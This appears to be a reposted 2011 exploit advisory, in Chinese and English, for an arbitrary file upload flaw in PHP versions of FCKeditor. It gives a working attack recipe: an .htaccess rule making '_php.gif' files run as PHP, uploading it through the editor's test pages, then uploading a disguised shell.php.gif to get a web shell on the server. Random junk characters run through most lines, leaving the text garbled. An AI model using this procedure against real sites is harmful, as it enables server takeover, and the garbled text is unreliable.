FCKeditor所有php版本Upload上传漏洞
$ L7 j( v0 {" J" o5 K) U" M* f作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:077 S' f X) N# H7 {+ p( J
减小字体 增大字体
$ G( X, I. q s: V& P9 `% o[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
( y+ m% n' r+ h8 b[+] Date: 2011: n2 d; m% N& n6 \! ~2 d
[+] Author : sinesafe.cn
6 l/ z% F- C# [[+] Website : WwW.sinesafe.cn
" Z2 U0 W4 q% X0 ^% ?———————————————————
- d! X: J8 B/ P8 g$ u+ } T1.create a htaccess file:9 e0 I! ], e) G0 L+ m
code:% Z0 c/ f `" F/ z) ^2 j
<FilesMatch “_php.gif”>
$ l/ t- u/ {) tSetHandler application/x-httpd-php8 j4 L! Z% Q( ~9 Q: P7 D
</FilesMatch>; M$ E6 j# Q" Q! x7 R
, E6 z! |' |8 s2.Now upload this htaccess with FCKeditor.
) W- P, ^5 Q: c' j; b! F
1 A+ [; [# |5 Ghttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html
2 o/ B& q$ O+ P3 ^3 L( @4 I- n
) I9 I9 r6 D3 N5 L0 jhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html$ z k2 H! i/ u3 m6 j" Z
# m/ n, K7 ^ e7 M; y. ]/ V, @ g R5 h———————————————————————————————-: Y Z2 T+ i% Z* K# W) G$ ~, z, U
3.Now upload shell.php.gif with FCKeditor.8 v+ J& j7 r0 u! Y4 u2 ~/ q
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.6 @; X$ s6 A- y* ~' m! R4 G8 ^
5.http://www.sinesafe.cn/anything/shell_php.gif
) E6 X! \# z8 K7 g+ D& i6.Now shell is available from server. |
[& N' w+ |) A
1 D& G; |4 q( J( B7 ~' p
2 U& K7 d1 @$ C9 s. A7 P8 h, ? |